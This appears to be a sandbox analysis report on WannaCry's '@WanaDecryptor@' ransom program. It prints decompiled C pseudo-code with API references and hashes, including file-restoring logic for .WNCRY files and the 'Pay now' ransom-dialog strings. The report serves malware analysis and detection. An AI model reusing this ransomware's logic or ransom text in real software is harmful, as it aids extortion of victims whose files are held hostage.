                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                                      • String ID: Arial
                                                      • API String ID: 1126252797-493054409
                                                      • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                                      • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E00406DC0(void* __ecx) {
                                                      				int _v76;
                                                      				int _v80;
                                                      				char _v84;
                                                      				int _v88;
                                                      				long _v92;
                                                      				void* _v96;
                                                      				int _v100;
                                                      				void* _v104;
                                                      				long _t28;
                                                      				void* _t29;
                                                      				struct HWND__* _t30;
                                                      				int _t32;
                                                      				void* _t35;
                                                      				int _t39;
                                                      				long _t47;
                                                      				int _t48;
                                                      				void* _t51;
                                                      
                                                      				_t35 = __ecx;
                                                      				_t48 = 0;
                                                      				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
                                                      				_t47 = _t28;
                                                      				_v96 = 0;
                                                      				_v92 = _t47;
                                                      				_t4 = _t47 + 1; // 0x1
                                                      				L00412CEC();
                                                      				_t51 =  &_v104 + 4;
                                                      				_v88 = _t28;
                                                      				if(_t28 == 0) {
                                                      					return _t28;
                                                      				}
                                                      				_t29 = _t35 + 0x4c0;
                                                      				if(_t29 != 0) {
                                                      					_t30 =  *(_t29 + 0x20);
                                                      				} else {
                                                      					_t30 = 0;
                                                      				}
                                                      				SendMessageA(_t30, 0x44b, _t48,  &_v96);
                                                      				_t32 = _v88;
                                                      				 *((char*)(_t32 + _t47)) = 0;
                                                      				if(_t47 < 0) {
                                                      					L15:
                                                      					_push(_v88);
                                                      					L00412C98();
                                                      					return _t32;
                                                      				} else {
                                                      					do {
                                                      						__imp___strnicmp(_t48 + _v88, "<http://", 8);
                                                      						_t51 = _t51 + 0xc;
                                                      						if(_t32 == 0) {
                                                      							L7:
                                                      							_t48 = _t48 + 1;
                                                      							_t39 = _t48;
                                                      							if(_t48 > _t47) {
                                                      								goto L14;
                                                      							}
                                                      							_t32 = _v88;
                                                      							while( *((char*)(_t48 + _t32)) != 0x3e) {
                                                      								_t48 = _t48 + 1;
                                                      								if(_t48 <= _t47) {
                                                      									continue;
                                                      								}
                                                      								goto L14;
                                                      							}
                                                      							_t32 = _t48;
                                                      							_t48 = _t48 + 1;
                                                      							if(_t32 != 0xffffffff) {
                                                      								_v100 = _t32;
                                                      								_v104 = _t39;
                                                      								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
                                                      								_t32 = 0x20;
                                                      								_push( &_v84);
                                                      								_v84 = 0x54;
                                                      								_v76 = 0x20;
                                                      								_v80 = 0x20;
                                                      								L00412F4A();
                                                      							}
                                                      							goto L14;
                                                      						}
                                                      						_t32 = _v88;
                                                      						__imp___strnicmp(_t48 + _t32, "<https://", 9);
                                                      						_t51 = _t51 + 0xc;
                                                      						if(_t32 != 0) {
                                                      							goto L14;
                                                      						}
                                                      						goto L7;
                                                      						L14:
                                                      						_t48 = _t48 + 1;
                                                      					} while (_t48 <= _t47);
                                                      					goto L15;
                                                      				}
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                                      • #823.MFC42(00000001,?,?), ref: 00406DEC
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                                      • _strnicmp.MSVCRT ref: 00406E3E
                                                      • _strnicmp.MSVCRT ref: 00406E5A
                                                      • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                                      • #6136.MFC42 ref: 00406EC4
                                                      • #825.MFC42(?), ref: 00406ED7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$_strnicmp$#6136#823#825
                                                      • String ID: <http://$<https://$T
                                                      • API String ID: 1228111698-1216084165
                                                      • Opcode ID: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
                                                      • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                                      • Opcode Fuzzy Hash: e226602ddc61248ba8de4c220f9c6f0969af954b0c2e6c7ec46426c0281c0da6
                                                      • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E00402560(intOrPtr __ecx, WCHAR* _a4) {
                                                      				short _v720;
                                                      				intOrPtr _v724;
                                                      				void* _t21;
                                                      				void* _t22;
                                                      				WCHAR* _t23;
                                                      				void* _t30;
                                                      				short* _t31;
                                                      				intOrPtr* _t32;
                                                      				void* _t34;
                                                      				void* _t36;
                                                      
                                                      				_t23 = _a4;
                                                      				_v724 = __ecx;
                                                      				_t30 = 0;
                                                      				wcscpy( &_v720, _t23);
                                                      				_t31 = wcsrchr( &_v720, 0x2e);
                                                      				_t34 =  &_v724 + 0x10;
                                                      				if(_t31 == 0) {
                                                      					L4:
                                                      					wcscat( &_v720, L".org");
                                                      				} else {
                                                      					_t32 = __imp___wcsicmp;
                                                      					_t21 =  *_t32(_t31, L".WNCRY");
                                                      					_t36 = _t34 + 8;
                                                      					if(_t21 == 0) {
                                                      						L3:
                                                      						 *_t31 = 0;
                                                      						_t30 = 1;
                                                      					} else {
                                                      						_t22 =  *_t32(_t31, L".WNCYR");
                                                      						_t34 = _t36 + 8;
                                                      						if(_t22 != 0) {
                                                      							goto L4;
                                                      						} else {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      				}
                                                      				if(E004020A0(_v724, _t23,  &_v720) == 0) {
                                                      					DeleteFileW( &_v720);
                                                      					goto L11;
                                                      				} else {
                                                      					if(DeleteFileW(_t23) == 0) {
                                                      						L11:
                                                      						return 0;
                                                      					} else {
                                                      						if(_t30 != 0) {
                                                      							return 1;
                                                      						} else {
                                                      							return MoveFileW( &_v720, _t23);
                                                      						}
                                                      					}
                                                      				}
                                                      			}














                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                                      • String ID: .WNCRY$.WNCYR$.org
                                                      • API String ID: 1016768320-4283512309
                                                      • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                                      • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                      				CHAR* _v8;
                                                      				intOrPtr* _v24;
                                                      				intOrPtr _v28;
                                                      				struct _STARTUPINFOA _v96;
                                                      				int _v100;
                                                      				char** _v104;
                                                      				int _v108;
                                                      				void _v112;
                                                      				char** _v116;
                                                      				intOrPtr* _v120;
                                                      				intOrPtr _v124;
                                                      				intOrPtr* _t23;
                                                      				intOrPtr* _t24;
                                                      				void* _t27;
                                                      				void _t29;
                                                      				intOrPtr _t36;
                                                      				signed int _t38;
                                                      				int _t40;
                                                      				intOrPtr* _t41;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t46;
                                                      				intOrPtr _t47;
                                                      				intOrPtr _t49;
                                                      				intOrPtr* _t55;
                                                      				intOrPtr _t58;
                                                      				intOrPtr _t61;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x41baa8);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t58;
                                                      				_v28 = _t58 - 0x68;
                                                      				_v8 = 0;
                                                      				__set_app_type(2);
                                                      				 *0x422298 =  *0x422298 | 0xffffffff;
                                                      				 *0x42229c =  *0x42229c | 0xffffffff;
                                                      				_t23 = __p__fmode();
                                                      				_t46 =  *0x42228c; // 0x0
                                                      				 *_t23 = _t46;
                                                      				_t24 = __p__commode();
                                                      				_t47 =  *0x422288; // 0x0
                                                      				 *_t24 = _t47;
                                                      				 *0x422294 = _adjust_fdiv;
                                                      				_t27 = E004133C7( *_adjust_fdiv);
                                                      				_t61 =  *0x421790; // 0x1
                                                      				if(_t61 == 0) {
                                                      					__setusermatherr(E004133C4);
                                                      				}
                                                      				E004133B2(_t27);
                                                      				_push(0x41f018);
                                                      				_push(0x41f014);
                                                      				L004133AC();
                                                      				_t29 =  *0x422284; // 0x0
                                                      				_v112 = _t29;
                                                      				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
                                                      				_push(0x41f010);
                                                      				_push(0x41f000);
                                                      				L004133AC();
                                                      				_t55 =  *_acmdln;
                                                      				_v120 = _t55;
                                                      				if( *_t55 != 0x22) {
                                                      					while( *_t55 > 0x20) {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				} else {
                                                      					do {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      						_t42 =  *_t55;
                                                      					} while (_t42 != 0 && _t42 != 0x22);
                                                      					if( *_t55 == 0x22) {
                                                      						L6:
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				}
                                                      				_t36 =  *_t55;
                                                      				if(_t36 != 0 && _t36 <= 0x20) {
                                                      					goto L6;
                                                      				}
                                                      				_v96.dwFlags = 0;
                                                      				GetStartupInfoA( &_v96);
                                                      				if((_v96.dwFlags & 0x00000001) == 0) {
                                                      					_t38 = 0xa;
                                                      				} else {
                                                      					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                      				}
                                                      				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                                      				_v108 = _t40;
                                                      				exit(_t40);
                                                      				_t41 = _v24;
                                                      				_t49 =  *((intOrPtr*)( *_t41));
                                                      				_v124 = _t49;
                                                      				_push(_t41);
                                                      				_push(_t49);
                                                      				L004133A6();
                                                      				return _t41;
                                                      			}






























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                                      • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00404280(void* __ecx, char _a8) {
                                                      				void* _t9;
                                                      				struct HWND__* _t10;
                                                      				long _t12;
                                                      				long* _t22;
                                                      				void* _t24;
                                                      
                                                      				_t24 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                                      					E00404530(__ecx);
                                                      				}
                                                      				_t9 = E004045E0(_t24,  &_a8);
                                                      				if(_t9 == 0) {
                                                      					L6:
                                                      					L00412CBC();
                                                      					return _t9;
                                                      				} else {
                                                      					_t22 = _t24 + 0x44;
                                                      					_push(0);
                                                      					_push("mailto:");
                                                      					L00412DB2();
                                                      					if(_t9 != 0) {
                                                      						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
                                                      						goto L6;
                                                      					} else {
                                                      						_t10 = GetParent( *(_t24 + 0x20));
                                                      						_push(_t10);
                                                      						L00412DAC();
                                                      						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
                                                      						L00412CBC();
                                                      						return _t12;
                                                      					}
                                                      				}
                                                      			}









                                                      APIs
                                                      • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                                      • GetParent.USER32(?), ref: 004042BB
                                                      • #2864.MFC42(00000000), ref: 004042C2
                                                      • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                                      • #2379.MFC42 ref: 004042DD
                                                        • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                                        • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                        • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                        • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                        • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                                      • #2379.MFC42(?), ref: 004042FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                                      • String ID: mailto:$open
                                                      • API String ID: 1144735033-2326261162
                                                      • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                                      • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E004038F0(void* __ecx, void* __ebp) {
                                                      				long _v4;
                                                      				intOrPtr _v16;
                                                      				char _v1252;
                                                      				char _v1284;
                                                      				void* __edi;
                                                      				int _t20;
                                                      				int _t23;
                                                      				void* _t30;
                                                      				long _t48;
                                                      				void* _t50;
                                                      				intOrPtr _t53;
                                                      				void* _t54;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041367B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t53;
                                                      				_t54 = _t53 - 0x4f8;
                                                      				_t50 = __ecx;
                                                      				E00403EB0( *[fs:0x0], __ecx, 0);
                                                      				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
                                                      				if(_t20 != 0xffffffff) {
                                                      					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
                                                      					_t57 =  *((intOrPtr*)(_t48 + 8));
                                                      					if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                                      						E00403AF0(_t48, __ebp);
                                                      					}
                                                      					E00401E90( &_v1252, _t57);
                                                      					_v4 = 0;
                                                      					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
                                                      					_t54 = _t54 + 0xc;
                                                      					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
                                                      						_t30 = E00403A20( &_v1252, _t48);
                                                      						__eflags = _t30;
                                                      						if(_t30 != 0) {
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("All your files have been decrypted!");
                                                      							goto L8;
                                                      						}
                                                      					} else {
                                                      						if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("Pay now, if you want to decrypt ALL your files!");
                                                      							L8:
                                                      							L00412CC8();
                                                      						}
                                                      					}
                                                      					_v4 = 0xffffffff;
                                                      					_t20 = E00401F30( &_v1252);
                                                      				}
                                                      				E00403EB0(_t20, _t50, 1);
                                                      				_t23 = CloseHandle( *(_t50 + 0xf4));
                                                      				 *(_t50 + 0xf4) = 0;
                                                      				 *[fs:0x0] = _v16;
                                                      				return _t23;
                                                      			}
















                                                      APIs
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                                      • sprintf.MSVCRT ref: 0040397A
                                                      • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                                        • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                                        • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                                        • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                        • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                                      Strings
                                                      • %08X.dky, xrefs: 00403969
                                                      • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                                      • All your files have been decrypted!, xrefs: 004039C3
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                                      • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                                      • API String ID: 139182656-2046724789
                                                      • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                                      • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00404090(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t16;
                                                      				intOrPtr _t34;
                                                      				intOrPtr _t39;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413739);
                                                      				_t16 =  *[fs:0x0];
                                                      				_push(_t16);
                                                      				 *[fs:0x0] = _t39;
                                                      				_push(__ecx);
                                                      				_t34 = __ecx;
                                                      				_v16 = __ecx;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx)) = 0x415d70;
                                                      				_v4 = 0;
                                                      				L00412DA6();
                                                      				_v4 = 1;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v4 = 3;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                                      				L00412DA0();
                                                      				_push(_t16);
                                                      				L00412D9A();
                                                      				 *((char*)(__ecx + 0x5a)) = 0;
                                                      				 *((char*)(__ecx + 0x58)) = 0;
                                                      				 *((char*)(__ecx + 0x59)) = 0;
                                                      				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
                                                      				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                      				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t34;
                                                      			}










                                                      APIs
                                                      • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                      • #860.MFC42(00421798), ref: 004040F6
                                                      • #858.MFC42(00000000,00421798), ref: 004040FE
                                                      • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540CursorLoad$#567#858#860
                                                      • String ID: 0ZA
                                                      • API String ID: 2440951079-2594568282
                                                      • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                                      • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E00407CB0() {
                                                      				char _v8;
                                                      				intOrPtr _v16;
                                                      				char _v28;
                                                      				char _v40;
                                                      				void* _v104;
                                                      				void* _v168;
                                                      				char _v260;
                                                      				void* _v264;
                                                      				char* _t24;
                                                      				intOrPtr _t34;
                                                      				intOrPtr* _t35;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413F77);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t34;
                                                      				_t35 = _t34 - 0xfc;
                                                      				E004030E0( &_v260, 0);
                                                      				_v8 = 0;
                                                      				L00412B72();
                                                      				_v8 = 1;
                                                      				_t24 =  &_v28;
                                                      				_v28 = 0x415c00;
                                                      				 *_t35 = _t24;
                                                      				_v8 = 5;
                                                      				L00412D52();
                                                      				_v28 = 0x415bec;
                                                      				 *_t35 =  &_v40;
                                                      				_v40 = 0x415c00;
                                                      				_v8 = 6;
                                                      				L00412D52();
                                                      				_v40 = 0x415bec;
                                                      				_v8 = 2;
                                                      				L00412D4C();
                                                      				_v8 = 1;
                                                      				L00412D3A();
                                                      				_v8 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v16;
                                                      				return _t24;
                                                      			}















                                                      APIs
                                                        • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      • #2514.MFC42 ref: 00407CE5
                                                      • #2414.MFC42 ref: 00407D1A
                                                      • #2414.MFC42 ref: 00407D4F
                                                      • #616.MFC42 ref: 00407D6E
                                                      • #693.MFC42 ref: 00407D7F
                                                      • #641.MFC42 ref: 00407D93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#567$#2514#324#616#641#693
                                                      • String ID: [A$[A
                                                      • API String ID: 3779294304-353784214
                                                      • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                                      • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
